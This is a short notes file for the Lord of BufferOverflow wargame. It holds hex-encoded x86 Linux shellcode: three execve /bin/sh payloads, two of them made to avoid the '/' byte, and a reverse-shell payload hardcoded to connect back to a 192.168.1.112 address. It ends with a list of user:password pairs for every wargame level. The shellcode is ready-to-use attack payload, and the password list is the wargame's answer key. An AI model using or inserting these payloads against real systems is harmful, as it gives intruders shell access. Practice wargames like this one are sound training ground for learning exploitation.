LOB setting : https://intadd.tistory.com/106

# 24bytes SHELLCODE -> but, have "\x2f" -> '/'
\x31\xc0\x50\x68\x2f\x2f\x73\x68\x68\x2f\x62\x69\x6e\x89\xe3\x50\x53\x89\xe1\x99\xb0\x0b\xcd\x80

# 25bytes without "\x2f"
\x31\xc0\x31\xd2\xb0\x0b\x52\x68\x2f\x2f\x73\x68\x68\x2f\x62\x69\x6e\x89\xe3\x52\x53\x89\xe1\xcd\x80

# 31bytes
# other SHELLCODE doesn't have "\x2f"
\x31\xc0\x50\xba\x2e\x2e\x72\x67\x81\xc2\x01\x01\x01\x01\x52\xb9\x2e\x62\x69\x6e\x83\xc1\x01\x51\x89\xe3\x50\x53\x89\xe1\x89\xc2\xb0\x0b\xcd\x80

# reverse SHELLCODE
"\x31\xdb\x53\x43\x53\x6a\x02\x6a\x66\x58\x89\xe1\xcd\x80\x93\x59\xb0\x3f\xcd\x80\x49\x79\xf9\x5b\x5a\x68\xc0\xa8\x01\x70\x66\x68\x1f\x2b\x43\x66\x53\x89\xe1\xb0\x66\x50\x51\x53\x89\xe1\x43\xcd\x80\x52\x68\x2f\x2f\x73\x68\x68\x2f\x62\x69\x6e\x89\xe3\x52\x53\x89\xe1\xb0\x0b\xcd\x80"

gate:gate
gremlin:hello bof world
cobolt:hacking exposed
goblin:hackers proof
orc:cantata
wolfman:love eyuna
darkelf:kernel crashed
orge:timewalker
troll:aspirin
vampire:music world
skeleton:shellcoder
golem:cup of coffee
darkknight:new attacker
bugbear:new divide
giant:one step closer
assassin:pushing me away
zombie_assassin:no place to hide
succubus:here to stay
nightmare:beg for me
xavius:throw me away
death_knight:got the life